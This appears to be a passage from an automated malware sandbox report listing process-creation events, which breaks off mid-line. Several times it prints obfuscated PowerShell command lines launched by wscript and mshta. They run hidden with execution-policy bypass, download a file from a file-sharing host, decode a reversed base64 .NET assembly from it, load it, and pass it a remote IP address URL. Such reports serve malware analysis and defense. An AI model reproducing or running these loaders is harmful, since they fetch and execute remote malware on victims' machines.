agicagic1oqu1ficagicagicagicagicagicagicagicagicagicagicagicj1qul0r1yiicagicagicagicagicagicagicagicagicagicagicagic1oyw1lu3bhy2ugicagicagicagicagicagicagicagicagicagicagicagc2lszgjgtiagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicr2ykt5mlcyafo6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjm0ljiwns4xmzuvmti0nc9jcmvhdgdvb2rpzgvhzm9yznv0dxjlynvzaw5lc3nkzxzlbg9wd2l0ag5py2v0agluz3nnzxriywnrb24udelgiiwijevovjpbufbeqvrbxgnyzwf0z29vzglkzwfmb3jmdxr1cmvidxnpbmvzc2rldmvsb3b3axrobmljzxroaw4udkjziiwwldapo3n0qvjulvnsrwvwkdmpo0lfecagicagicagicagicagicagicagicagicagicagicagicaijevuvjpbufbeqvrbxgnyzwf0z29vzglkzwfmb3jmdxr1cmvidxnpbmvzc2rldmvsb3b3axrobmljzxroaw4udkjzig=='+[char]0x22+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnbkvyaw1hz2vvcmwgpsbattvodhrwczovlzmxmduuzmlszw1hawwuy29tl2fwas9mawxll2dldd9mawwnkydla2v5pxnovfbiyknqwdhvlwxpdenxsexhnl8ween5lxhsnhruegxbvmjroscrjzutjysnzhzpves1y0fsyu5kuscrj2piyjntzxhmd1f6s21uwgcnkycmc2tpchjlzz10cnvljnbrx3zpzccrjz1lmdewotyzogm5ymziotu3mtczmjuzmtmwowi1zmy3yybajysnttu7bkvyd2unkydiq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlykmnkydsawvuddturxjpbwfnzuj5dgvzid0gbkvyd2viq2xpzw50lkrvd25sb2fkrgf0ysgnkydurxjpbwfnzvvybck7bkvyaw1hz2vuzxh0id0gwycrj1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhinkydpbmcobkvyaw1hz2vcescrj3rlcyk7bkvyc3rhcnrgbgfnid0nkycgwk01pdxcqvnfnjrfu1rbulq+plpnnscrjzturxjlbmrgbgfnid0gwk01pdxcqvnfnjrfjysnru5epj5attu7bkvyc3rhcnrjbmrleca9ig5fcmltywdlvgv4jysndc5jbmrlee9mkg5fcnn0yxj0rmxhzyk7bkvyzw5ksw5kjysnzxggpsburxjpbwfnzvrlehqusw5kzxhpzignkydurxjlbmrgbgfnktturscrj3jzdgfydelujysnzgv4ic1nzsawic1hbmqgbkvyzw5ksw5kzxgglwd0ig5fcnn0yxj0sw5kzxg7bkvyc3rhcnrjbmrlecarpsburxjzdgfydezsywcutgvuz3roo25fcmjhc2u2nccrj0wnkydlbmd0aca9ig5fcmvuzeluzgunkyd4ic0gbkvyc3rhjysncnrjbmrledturxjiyxnlnjrdb21tyw5kid0gbkvyaw1hz2vuzxh0lln1ynn0cmluzyhurxjzdgfydeluzgv4lcburxjiyxnlnjrmzw5ndggnkycpo25fcmjhc2u2nfjldmvyc2vkid0glwpvaw4gkg5fcmjhjysnc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksbkstygrm9yrwfjaccrjy1pymply3qgeyburxjfih0pwy0xli4tkg5fcmjhc2u2nenvbw1hbmqutgvuz3rokv07bkvyy29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6jysnrnjvbujhcycrj2u2nfn0cmluzyhurxjiyxnlnjrszxzlcnnlzck7bkvybg9hzgvkqxnzzw1ibhkgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkg5fcmnvbw1hbmrcexrlcyk7bkvydmfptwv0ag9kid0gw2rubglilklplkhvbwvdlkdlde1ldghvzccrjyhattvwqulattupo25fcnzhau1ldghvzc5jbnzva2uobkvybnvsbcwgqchattv0ehquulnsvljtlycrjzq0mjevntmxljunkycwmi40mziumjcxly86chr0afpnnswgwk01jysnzgvzyxrpdmfkb1pnnswgwk01zgvzyxrpdmfkb1pnnswgwk01zgvzyxrpdmfkb1pnjysnnswgwk01q2fzug9swk01lcbattvkzxnhdgl2ywrvwk01lcbattvkzxnhdgl2ywrvwk01lfpnnwrlc2f0axzhzg9attuswicrj001zgvzyxrpdmfkb1onkydnnsxattvkzxnhdgl2ywrvjysnwk0nkyc1lfpnnwrlc2f0axzhzg9attuswk01zgvzyxrpdmfkjysnb1pnnscrjyxattuxwk01lfpnnwrlc2f0axzhzg9attupktsnksaglvjlugxhy0ugichby2hhcl0xmtarw2noyxjdnjkrw2noyxjdmte0ksxby2hhcl0zni1dumvwbefjrsagj1pnnscsw2noyxjdmzkgic1szvbsywnfkftjagfyxtc0k1tjagfyxtczk1tjagfyxtu0ksxby2hhcl0xmjqpfcygkcakcfnit01fwzrdkyrqu2hptuvbmzbdkyd4jyk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nerimageurl = zm5https://3105.filemail.com/api/file/get?fil'+'ekey=shtphbcpx8o-lotcqhlg6_0xcy-xl4tnxlavbq9'+'5-'+'dvitk5carandq'+'jbb3mexfwqzkmtxg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c z'+'m5;nerwe'+'bclient = new-object system.net.webc'+'lient;nerimagebytes = nerwebclient.downloaddata('+'nerimageurl);nerimagetext = ['+'system.text.encoding]::utf8.getstr'+'ing(nerimageby'+'tes);nerstartflag ='+' zm5<<base64_start>>zm5'+';nerendflag = zm5<<base64_'+'end>>zm5;nerstartindex = nerimagetex'+'t.indexof(nerstartflag);nerendind'+'ex = nerimagetext.indexof('+'nerendflag);ne'+'rstartin'+'dex -ge 0 -and nerendindex -gt nerstartindex;nerstartindex += nerstartflag.length;nerbase64'+'l'+'ength = nerendinde'+'x - nersta'+'rtindex;nerbase64command = nerimagetext.substring(nerstartindex, nerbase64length'+');nerbase64reversed = -join (nerba'+'se64command.tochararray() ji6 foreach'+'-object { ner_ })[-1..-(nerbase64command.length)];nercommandbytes = [system.convert]::'+'frombas'+'e64string(nerbase64reversed);nerloadedassembly = [system.reflection.assembly]::load(nercommandbytes);nervaimethod = [dnlib.io.home].getmethod'+'(zm5vaizm5);nervaimethod.invoke(nernull, @(zm5txt.rsrvrs/'+'4421/531.5'+'02.432.271//:ptthzm5, zm5'+'desativadozm5, zm5desativadozm5, zm5desativadozm'+'5, zm5caspolzm5, zm5desativadozm5, zm5desativadozm5,zm5desativadozm5,z'+'m5desativadoz'+'m5,zm5desativado'+'zm'+'5,zm5desativadozm5,zm5desativad'+'ozm5'+',zm51zm5,zm5desativadozm5));') -replace ([char]110+[char]69+[char]114),[char]36-creplace 'zm5',[char]39 -replace([char]74+[char]73+[char]54),[char]124)|& ( $pshome[4]+$pshome[30]+'x')"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jhzis3kyvzjowiagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagigfkzc1uexbficagicagicagicagicagicagicagicagicagicagicagic1tru1crvjezuzjbml0au9uicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxtt24ilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagig1hs29by2gsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagihnntlfvznjsuuusc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagighadfzytk9qlhvpbnqgicagicagicagicagicagicagicagicagicagicagicagvexxuhptvsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicaguhrmktsnicagicagicagicagicagicagicagicagicagicagicagic1oqu1ficagicagicagicagicagicagicagicagicagicagicagicj1qul0r1yiicagicagicagicagicagicagicagicagicagicagicagic1oyw1lu3bhy2ugicagicagicagicagicagicagicagicagicagicagicagc2lszgjgtiagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicr2ykt5mlcyafo6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjm0ljiwns4xmzuvmti0nc9jcmvhdgdvb2rpzgvhzm9yznv0dxjlynvzaw5lc3nkzxzlbg9wd2l0ag5py2v0agluz3nnzxriywnrb24udelgiiwijevovjpbufbeqvrbxgnyzwf0z29vzglkzwfmb3jmdxr1cmvidxnpbmvzc2rldmvsb3b3axrobmljzxroaw4udkjziiwwldapo3n0qvjulvnsrwvwkdmpo0lfecagicagicagicagicagicagicagicagicagicagicagicaijevuvjpbufbeqvrbxgnyzwf0z29vzglkzwfmb3jmdxr1cmvidxnpbmvzc2rldmvsb3b3axrobmljzxroaw4udkjzig=='+[char]0x22+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnbkvyaw1hz2vvcmwgpsbattvodhrwczovlzmxmduuzmlszw1hawwuy29tl2fwas9mawxll2dldd9mawwnkydla2v5pxnovfbiyknqwdhvlwxpdenxsexhnl8ween5lxhsnhruegxbvmjroscrjzutjysnzhzpves1y0fsyu5kuscrj2piyjntzxhmd1f6s21uwgcnkycmc2tpchjlzz10cnvljnbrx3zpzccrjz1lmdewotyzogm5ymziotu3mtczmjuzmtmwowi1zmy3yybajysnttu7bkvyd2unkydiq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlykmnkydsawvuddturxjpbwfnzuj5dgvzid0gbkvyd2viq2xpzw50lkrvd25sb2fkrgf0ysgnkydurxjpbwfnzvvybck7bkvyaw1hz2vuzxh0id0gwycrj1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhinkydpbmcobkvyaw1hz2vcescrj3rlcyk7bkvyc3rhcnrgbgfnid0nkycgwk01pdxcqvnfnjrfu1rbulq+plpnnscrjzturxjlbmrgbgfnid0gwk01pdxcqvnfnjrfjysnru5epj5attu7bkvyc3rhcnrjbmrleca9ig5fcmltywdlvgv4jysndc5jbmrlee9mkg5fcnn0yxj0rmxhzyk7bkvyzw5ksw5kjysnzxggpsburxjpbwfnzvrlehqusw5kzxhpzignkydurxjlbmrgbgfnktturscrj3jzdgfydelujysnzgv4ic1nzsawic1hbmqgbkvyzw5ksw5kzxgglwd0ig5fcnn0yxj0sw5kzxg7bkvyc3rhcnrjbmrlecarpsburxjzdgfydezsywcutgvuz3roo25fcmjhc2u2nccrj0wnkydlbmd0aca9ig5fcmvuzeluzgunkyd4ic0gbkvyc3rhjysncnrjbmrledturxjiyxnlnjrdb21tyw5kid0gbkvyaw1hz2vuzxh0lln1ynn0cmluzyhurxjzdgfydeluzgv4lcburxjiyxnlnjrmzw5ndggnkycpo25fcmjhc2u2nfjldmvyc2vkid0glwpvaw4gkg5fcmjhjysnc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksbkstygrm9yrwfjaccrjy1pymply3qgeyburxjfih0pwy0xli4tkg5fcmjhc2u2nenvbw1hbmqutgvuz3rokv07bkvyy29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6jysnrnjvbujhcycrj2u2nfn0cmluzyhurxjiyxnlnjrszxzlcnnlzck7bkvybg9hzgvkqxnzzw1ibhkgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkg5fcmnvbw1hbmrcexrlcyk7bkvydmfptwv0ag9kid0gw2rubglilklplkhvbwvdlkdlde1ldghvzccrjyhattvwqulattupo25fcnzhau1ldghvzc5jbnzva2uobkvybnvsbcwgqchattv0ehquulnsvljtlycrjzq0mjevntmxljunkycwmi40mziumjcxly86chr0afpnnswgwk01jysnzgvzyxrpdmfkb1pnnswgwk01zgvzyxrpdmfkb1pnnswgwk01zgvzyxrpdmfkb1pnjysnnswgwk01q2fzug9swk01lcbattvkzxnhdgl2ywrvwk01lcbattvkzxnhdgl2ywrvwk01lfpnnwrlc2f0axzhzg9attuswicrj001zgvzyxrpdmfkb1onkydnnsxattvkzxnhdgl2ywrvjysnwk0nkyc1lfpnnwrlc2f0axzhzg9attuswk01zgvzyxrpdmfkjysnb1pnnscrjyxattuxwk01lfpnnwrlc2f0axzhzg9attupktsnksaglvjlugxhy0ugichby2hhcl0xmtarw2noyxjdnjkrw2noyxjdmte0ksxby2hhcl0zni1dumvwbefjrsagj1pnnscsw2noyxjdmzkgic1szvbsywnfkftjagfyxtc0k1tjagfyxtczk1tjagfyxtu0ksxby2hhcl0xmjqpfcygkcakcfnit01fwzrdkyrqu2hptuvbmzbdkyd4jyk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nerimageurl = zm5https://3105.filemail.com/api/file/get?fil'+'ekey=shtphbcpx8o-lotcqhlg6_0xcy-xl4tnxlavbq9'+'5-'+'dvitk5carandq'+'jbb3mexfwqzkmtxg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c z'+'m5;nerwe'+'bclient = new-object system.net.webc'+'lient;nerimagebytes = nerwebclient.downloaddata('+'nerimageurl);nerimagetext = ['+'system.text.encoding]::utf8.getstr'+'ing(nerimageby'+'tes);nerstartflag ='+' zm5<<base64_start>>zm5'+';nerendflag = zm5<<base64_'+'end>>zm5;nerstartindex = nerimagetex'+'t.indexof(nerstartflag);nerendind'+'ex = nerimagetext.indexof('+'nerendflag);ne'+'rstartin'+'dex -ge 0 -and nerendindex -gt nerstartindex;nerstartindex += nerstartflag.length;nerbase64'+'l'+'ength = nerendinde'+'x - nersta'+'rtindex;nerbase64command = nerimagetext.substring(nerstartindex, nerbase64length'+');nerbase64reversed = -join (nerba'+'se64command.tochararray() ji6 foreach'+'-object { ner_ })[-1..-(nerbase64command.length)];nercommandbytes = [system.convert]::'+'frombas'+'e64string(nerbase64reversed);nerloadedassembly = [system.reflection.assembly]::load(nercommandbytes);nervaimethod = [dnlib.io.home].getmethod'+'(zm5vaizm5);nervaimethod.invoke(nernull, @(zm5txt.rsrvrs/'+'4421/531.5'+'02.432.271//:ptthzm5, zm5'+'desativadozm5, zm5desativadozm5, zm5desativadozm'+'5, zm5caspolzm5, zm5desativadozm5, zm5desativadozm5,zm5desativadozm5,z'+'m5desativadoz'+'m5,zm5desativado'+'zm'+'5,zm5desativadozm5,zm5desativad'+'ozm5'+',zm51zm5,zm5desativadozm5));') -replace ([char]110+[char]69+[char]114),[char]36-creplace 'zm5',[char]39 -replace([char]74+[char]73+[char]54),[char]124)|& ( $pshome[4]+$pshome[30]+'x')"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jhzis3kyvzjowiagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagigfkzc1uexbficagicagicagicagicagicagicagicagicagicagicagic1tru1crvjezuzjbml0au9uicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxtt24ilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagig1hs29by2gsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagihnntlfvznjsuuusc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagighadfzytk9qlhvpbnqgicagicagicagicagicagicagicagicagicagicagicagvexxuhptvsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicaguhrmktsnicagicagicagicagicagicagicagicagicagicagicagic1oqu1ficagicagicagicagicagicagicagicagicagicagicagicj1qul0r1yiicagicagicagicagicagicagicagicagicagicagicagic1oyw1lu3bhy2ugicagicagicagicagicagicagicagicagicagicagicagc2lszgjgtiagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicr2ykt5mlcyafo6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjm0ljiwns4xmzuvmti0nc9jcmvhdgdvb2rpzgvhzm9yznv0dxjlynvzaw5lc3nkzxzlbg9wd2l0ag5py2v0agluz3nnzxriywnrb24udelgiiwijevovjpbufbeqvrbxgnyzwf0z29vzglkzwfmb3jmdxr1cmvidxnpbmvzc2rldmvsb3b3axrobmljzxroaw4udkjziiwwldapo3n0qvjulvnsrwvwkdmpo0lfecagicagicagicagicagicagicagicagicagicagicagicaijevuvjpbufbeqvrbxgnyzwf0z29vzglkzwfmb3jmdxr1cmvidxnpbmvzc2rldmvsb3b3axrobmljzxroaw4udkjzig=='+[char]0x22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnbkvyaw1hz2vvcmwgpsbattvodhrwczovlzmxmduuzmlszw1hawwuy29tl2fwas9mawxll2dldd9mawwnkydla2v5pxnovfbiyknqwdhvlwxpdenxsexhnl8ween5lxhsnhruegxbvmjroscrjzutjysnzhzpves1y0fsyu5kuscrj2piyjntzxhmd1f6s21uwgcnkycmc2tpchjlzz10cnvljnbrx3zpzccrjz1lmdewotyzogm5ymziotu3mtczmjuzmtmwowi1zmy3yybajysnttu7bkvyd2unkydiq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlykmnkydsawvuddturxjpbwfnzuj5dgvzid0gbkvyd2viq2xpzw50lkrvd25sb2fkrgf0ysgnkydurxjpbwfnzvvybck7bkvyaw1hz2vuzxh0id0gwycrj1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhinkydpbmcobkvyaw1hz2vcescrj3rlcyk7bkvyc3rhcnrgbgfnid0nkycgwk01pdxcqvnfnjrfu1rbulq+plpnnscrjzturxjlbmrgbgfnid0gwk01pdxcqvnfnjrfjysnru5epj5attu7bkvyc3rhcnrjbmrleca9ig5fcmltywdlvgv4jysndc5jbmrlee9mkg5fcnn0yxj0rmxhzyk7bkvyzw5ksw5kjysnzxggpsburxjpbwfnzvrlehqusw5kzxhpzignkydurxjlbmrgbgfnktturscrj3jzdgfydelujysnzgv4ic1nzsawic1hbmqgbkvyzw5ksw5kzxgglwd0ig5fcnn0yxj0sw5kzxg7bkvyc3rhcnrjbmrlecarpsburxjzdgfydezsywcutgvuz3roo25fcmjhc2u2nccrj0wnkydlbmd0aca9ig5fcmvuzeluzgunkyd4ic0gbkvyc3rhjysncnrjbmrledturxjiyxnlnjrdb21tyw5kid0gbkvyaw1hz2vuzxh0lln1ynn0cmluzyhurxjzdgfydeluzgv4lcburxjiyxnlnjrmzw5ndggnkycpo25fcmjhc2u2nfjldmvyc2vkid0glwpvaw4gkg5fcmjhjysnc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksbkstygrm9yrwfjaccrjy1pymply3qgeyburxjfih0pwy0xli4tkg5fcmjhc2u2nenvbw1hbmqutgvuz3rokv07bkvyy29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6jysnrnjvbujhcycrj2u2nfn0cmluzyhurxjiyxnlnjrszxzlcnnlzck7bkvybg9hzgvkqxnzzw1ibhkgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkg5fcmnvbw1hbmrcexrlcyk7bkvydmfptwv0ag9kid0gw2rubglilklplkhvbwvdlkdlde1ldghvzccrjyhattvwqulattupo25fcnzhau1ldghvzc5jbnzva2uobkvybnvsbcwgqchattv0ehquulnsvljtlycrjzq0mjevntmxljunkycwmi40mziumjcxly86chr0afpnnswgwk01jysnzgvzyxrpdmfkb1pnnswgwk01zgvzyxrpdmfkb1pnnswgwk01zgvzyxrpdmfkb1pnjysnnswgwk01q2fzug9swk01lcbattvkzxnhdgl2ywrvwk01lcbattvkzxnhdgl2ywrvwk01lfpnnwrlc2f0axzhzg9attuswicrj001zgvzyxrpdmfkb1onkydnnsxattvkzxnhdgl2ywrvjysnwk0nkyc1lfpnnwrlc2f0axzhzg9attuswk01zgvzyxrpdmfkjysnb1pnnscrjyxattuxwk01lfpnnwrlc2f0axzhzg9attupktsnksaglvjlugxhy0ugichby2hhcl0xmtarw2noyxjdnjkrw2noyxjdmte0ksxby2hhcl0zni1dumvwbefjrsagj1pnnscsw2noyxjdmzkgic1szvbsywnfkftjagfyxtc0k1tjagfyxtczk1tjagfyxtu0ksxby2hhcl0xmjqpfcygkcakcfnit01fwzrdkyrqu2hptuvbmzbdkyd4jyk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('nerimageurl = zm5https://3105.filemail.com/api/file/get?fil'+'ekey=shtphbcpx8o-lotcqhlg6_0xcy-xl4tnxlavbq9'+'5-'+'dvitk5carandq'+'jbb3mexfwqzkmtxg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c z'+'m5;nerwe'+'bclient = new-object system.net.webc'+'lient;nerimagebytes = nerwebclient.downloaddata('+'nerimageurl);nerimagetext = ['+'system.text.encoding]::utf8.getstr'+'ing(nerimageby'+'tes);nerstartflag ='+' zm5<<base64_start>>zm5'+';nerendflag = zm5<<base64_'+'end>>zm5;nerstartindex = nerimagetex'+'t.indexof(nerstartflag);nerendind'+'ex = nerimagetext.indexof('+'nerendflag);ne'+'rstartin'+'dex -ge 0 -and nerendindex -gt nerstartindex;nerstartindex += nerstartflag.length;nerbase64'+'l'+'ength = nerendinde'+'x - nersta'+'rtindex;nerbase64command = nerimagetext.substring(nerstartindex, nerbase64length'+');nerbase64reversed = -join (nerba'+'se64command.tochararray() ji6 foreach'+'-object { ner_ })[-1..-(nerbase64command.length)];nercommandbytes = [system.convert]::'+'frombas'+'e64string(nerbase64reversed);nerloadedassembly = [system.reflection.assembly]::load(nercommandbytes);nervaimethod = [dnlib.io.home].getmethod'+'(zm5vaizm5);nervaimethod.invoke(nernull, @(zm5txt.rsrvrs/'+'4421/531.5'+'02.432.271//:ptthzm5, zm5'+'desativadozm5, zm5desativadozm5, zm5desativadozm'+'5, zm5caspolzm5, zm5desativadozm5, zm5desativadozm5,zm5desativadozm5,z'+'m5desativadoz'+'m5,zm5desativado'+'zm'+'5,zm5desativadozm5,zm5desativad'+'ozm5'+',zm51zm5,zm5desativadozm5));') -replace ([char]110+[char]69+[char]114),[char]36-creplace 'zm5',[char]39 -replace([char]74+[char]73+[char]54),[char]124)|& ( $pshome[4]+$pshome[30]+'x')"Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jhzis3kyvzjowiagicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagigfkzc1uexbficagicagicagicagicagicagicagicagicagicagicagic1tru1crvjezuzjbml0au9uicagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ckxtt24ilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagig1hs29by2gsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagihnntlfvznjsuuusc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagighadfzytk9qlhvpbnqgicagicagicagicagicagicagicagicagicagicagicagvexxuhptvsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicaguhrmktsnicagicagicagicagicagicagicagicagicagicagicagic1oqu1ficagicagicagicagicagicagicagicagicagicagicagicj1qul0r1yiicagicagicagicagicagicagicagicagicagicagicagic1oyw1lu3bhy2ugicagicagicagicagicagicagicagicagicagicagicagc2lszgjgtiagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicr2ykt5mlcyafo6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xnziumjm0ljiwns4xmzuvmti0nc9jcmvhdgdvb2rpzgvhzm9yznv0dxjlynvzaw5lc3nkzxzlbg9wd2l0ag5py2v0agluz3nnzxriywnrb24udelgiiwijevovjpbufbeqvrbxgnyzwf0z29vzglkzwfmb3jmdxr1cmvidxnpbmvzc2rldmvsb3b3axrobmljzxroaw4udkjziiwwldapo3n0qvjulvnsrwvwkdmpo0lfecagicagicagicagicagicagicagicagicagicagicagicaijevuvjpbufbeqvrbxgnyzwf0z29vzglkzwfmb3jmdxr1cmvidxnpbmvzc2rldmvsb3b3axrobmljzxroaw4udkjzig=='+[char]0x22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnbkvyaw1hz2vvcmwgpsbattvodhrwczovlzmxmduuzmlszw1hawwuy29tl2fwas9mawxll2dldd9mawwnkydla2v5pxnovfbiyknqwdhvlwxpdenxsexhnl8ween5lxhsnhruegxbvmjroscrjzutjysnzhzpves1y0fsyu5kuscrj2piyjntzxhmd1f6s21uwgcnkycmc2tpchjlzz10cnvljnbrx3zpzccrjz1lmdewotyzogm5ymziotu3mtczmjuzmtmwowi1zmy3yybajysnttu7bkvyd2unkydiq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlykmnkydsawvuddturxjpbwfnzuj5dgvzid0gbkvyd2viq2xpzw50lkrvd25sb2fkrgf0ysgnkydurxjpbwfnzvvybck7bkvyaw1hz2vuzxh0id0gwycrj1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhinkydpbmcobkvyaw1hz2vcescrj3rlcyk7bkvyc3rhcnrgbgfnid0nkycgwk01pdxcqvnfnjrfu1rbulq+plpnnscrjzturxjlbmrgbgfnid0gwk01pdxcqvnfnjrfjysnru5epj5attu7bkvyc3rhcnrjbmrleca9ig5fcmltywdlvgv4jysndc5jbmrlee9mkg5fcnn0yxj0rmxhzyk7bkvyzw5ksw5kjysnzxggpsburxjpbwfnzvrlehqusw5kzxhpzignkydurxjlbmrgbgfnktturscrj3jzdgfydelujysnzgv4ic1nzsawic1hbmqgbkvyzw5ksw5kzxgglwd0ig5fcnn0yxj0sw5kzxg7bkvyc3rhcnrjbmrlecarpsburxjzdgfydezsywcutgvuz3roo25fcmjhc2u2nccrj0wnkydlbmd0aca9ig5fcmvuzeluzgunkyd4ic0gbkvyc3rhjysncnrjbmrledturxjiyxnlnjrdb21tyw5kid0gbkvyaw1hz2vuzxh0lln1ynn0cmluzyhurxjzdgfydeluzgv4lcburxjiyxnlnjrmzw5ndggnkycpo25fcmjhc2u2nfjldmvyc2vkid0glwpvaw4gkg5fcmjhjysnc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksbkstygrm9yrwfjaccrjy1pymply3qgeyburxjfih0pwy0xli4tkg5fcmjhc2u2nenvbw1hbmqutgvuz3rokv07bkvyy29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6jysnrnjvbujhcycrj2u2nfn0cmluzyhurxjiyxnlnjrszxzlcnnlzck7bkvybg9hzgvkqxnzzw1ibhkgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkg5fcmnvbw1hbmrcexrlcyk7bkvydmfptwv0ag9kid0gw2rubglilklplkhvbwvdlkdlde1ldghvzccrjyhattvwqulattupo25fcnzhau1ldghvzc5jbnzva2uobkvybnvsbcwgqchattv0ehquulnsvljtlycrjzq0m